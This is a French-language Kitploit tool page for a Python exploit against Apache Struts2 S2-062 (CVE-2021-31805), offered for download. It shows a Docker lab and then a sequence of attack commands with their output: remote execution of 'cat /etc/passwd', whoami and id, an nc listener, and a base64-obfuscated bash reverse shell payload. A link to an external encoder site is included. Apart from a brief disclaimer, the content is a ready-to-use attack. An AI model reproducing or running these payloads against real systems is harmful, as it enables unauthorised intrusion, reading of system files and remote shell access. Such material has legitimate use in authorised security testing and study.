Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Struts2_S2-062_CVE-2021-31805 — Exploit Python pour l'exécution de code à distance Apache Struts2 S2-062 (CVE-2021-31805), avec environnement de reproduction basé sur Docker et génération de payload de shell inversé. | Kitploit
Outils/GitHubGitHub/secnn/struts2_s2-062_cve-2021-31805
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubsecnn/struts2_s2-062_cve-2021-31805

Struts2_S2-062_CVE-2021-31805

Exploit Python pour l'exécution de code à distance Apache Struts2 S2-062 (CVE-2021-31805), avec environnement de reproduction basé sur Docker et génération de payload de shell inversé.

Voir le dépôt
115il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Struts2_S2-062_CVE-2021-31805

Vulnérabilité d'exécution de code à distance Apache Struts2 S2-062 (CVE-2021-31805) | Reverse Shell

Environnement de reproduction de la vulnérabilité

docker-compose.yml

root@kitploit:~
version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"

Tirer l'image et démarrer l'environnement

root@kitploit:~
docker-compose up -d

Adresse d'accès : http://1.1.1.1:8080

Script de vérification de la vulnérabilité

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

passwd

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

root

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

id

Reverse Shell

Écoute du port avec NC

root@kitploit:~
nc -lvvp 8081

NC

Construire le script de reverse shell encodé en base64, en utilisant le site suivant : https://ir0ny.top/pentest/reverse-encoder-shell.html base64

Obtention du Shell

root@kitploit:~
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"

shell

Shell obtenu avec succès

Shell_code

Avertissement

Ne pas utiliser à des fins illégales, uniquement pour des tests de sécurité, sinon les conséquences ne sont pas liées à ce projet. Remarque : tester les sites uniquement avec une autorisation légitime : pirater des sites sans autorisation, c'est faire pleurer ses proches.

Télécharger l’outil